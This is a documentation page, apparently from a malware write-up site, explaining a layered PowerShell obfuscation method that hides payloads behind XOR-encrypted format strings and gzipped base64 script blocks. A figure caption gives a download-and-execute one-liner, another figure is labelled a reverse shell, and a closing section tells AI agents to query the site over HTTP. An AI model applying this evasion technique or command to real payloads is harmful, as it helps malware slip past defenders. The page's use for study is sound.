# PowerShell Script Block Obfuscation

### Background

This method was developed to obfuscate a payload behind several gzipped base64 encoded script blocks and XOR encrypted format strings. All while avoiding setting as few variables as possible to prevent someone from running the script in PowerShell ISE and inspecting the variable assignments. The obfuscated script blocks can be ran with arguments and piped to each other.

### Analysis

The initial stage of the obfuscation starts by defining an XOR key and saves the input text characters XORed with the key, allowing for the string to be rebuilt later. Before the string is reassembled both arrays are shuffled the same way and saved. Then, a format string is build referencing the XOR key array and the value to rebuild the character encrypted. 

<figure><img src="/files/EnDSgV7ktEXM0NlN0kEa" alt=""><figcaption><p>Example first stage obfuscation</p></figcaption></figure>

After the obfuscated string is created the script will gzip and base64 encode the first stage payload and append the PowerShell commands to allow it to decompress and decode from the command line. For a simple string or a command with no arguments the obfuscation can stop here to save space in the final payload.

<figure><img src="/files/oVbYIEWM4spQt07UcC7c" alt=""><figcaption><p>Second stage obfuscation</p></figcaption></figure>

For commands with arguments the script will parse for the commands flags and arguments appending the flags and obfuscating the arguments. Lastly the script will take the built string and re-compress and encode the payload making one gzipped base64 encoded payload.

<figure><img src="/files/Vyuwuc3QVp2Fx0XXOYNx" alt=""><figcaption><p><em>irm -uri 127.0.0.1/test.ps1 | iex</em></p></figcaption></figure>

<figure><img src="/files/Am510LecWkF4e6faiNlM" alt=""><figcaption><p>Reverse shell example</p></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0x.b4dc0.de/malware-writeups/development/powershell-script-block-obfuscation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.